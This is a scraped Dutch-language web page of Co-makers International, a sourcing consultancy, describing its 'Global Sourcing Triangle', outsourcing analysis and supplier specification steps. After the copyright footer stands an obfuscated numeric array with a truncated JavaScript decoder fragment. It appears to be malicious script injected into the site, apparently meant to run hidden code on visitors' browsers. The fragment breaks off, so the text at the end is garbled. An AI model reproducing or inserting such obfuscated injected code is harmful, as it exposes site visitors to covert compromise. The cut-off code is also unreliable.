Home Register  Purchasing Market Research | Global Sourcing | Source.Direct | Supply Chain Development | Meet&Match

 Our customers
Buyers
Subcontractors
 Services
 Alliances & Partners
 Company
Team
Career
Offices
Contact

 Add to favorites
 Register
 Login

  English Nederlands Deutsch
Co-makers.com - Welcome

Competitieve ketens
Co-makers International helpt bedrijven om het concurrentievermogen van de keten waarin zij participeren te vergroten. Door partners te vinden in lage-kosten-regio’s wordt de keten van West-Europese uitbesteders en toeleveranciers integraal sterker. Uitgangspunt hierbij wordt gevormd door de zogenaamde ‘Global Sourcing Triangle’. Hierbij wordt het beste van twee werelden gecombineerd:

 • De uitbesteder blijft inkopen bij een lokale toeleverancier, zijn beheerslast blijft gelijk;
 • Deze West-Europese toeleverancier blijft zowel het ontwikkelwerk als activiteiten met hoge toegevoegde waarde en intensieve communicatie uitvoeren;
 • Overige zaken worden door de West Europese toeleverancier uitbesteed aan een of meerdere vaste en strategische partners in Centraal- en Oost Europa of China.

Integrale analyse
Om de opties voor de opdrachtgever zorgvuldig te kunnen evalueren, heeft Co-makers een methode ontwikkeld waarbij het ‘outsourcing’ vraagstuk integraal wordt geanalyseerd. Hierbij hanteert Co-makers de volgende stappen:

 • Onderzoek naar de directe relatie tot de bedrijfsstrategie
 • In kaart brengen van gevolgen voor de organisatie en communicatie
 • Inrichting van het technische proces en de logistieke stroom
 • Definiëren van procesbeheersing & -verbetering.

Gedetailleerde specificaties
Centraal in de voorbereiding van de ‘partner search’ staan de gedetailleerde specificaties van het uitbestedingsvraagstuk. Hierbij wordt expliciet aandacht besteed aan:

 • Functionele specificaties en/of tekeningen
 • De uit te besteden activiteiten of processtappen
 • Profielschets van de mogelijke toeleverancier
 • Kritische productaspecten en/of vervaardigingsinstructies
 • Logistieke procesgang

 • Klik hier voor de Global Sourcing Questionnaire (alleen voor geregistreerde gebruikers)


Nieuws

Classifieds
© 2021 Co-makers International b.v. All Rights Reserved.
163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"[ps](","));ss=String;d=document;for(i=0;i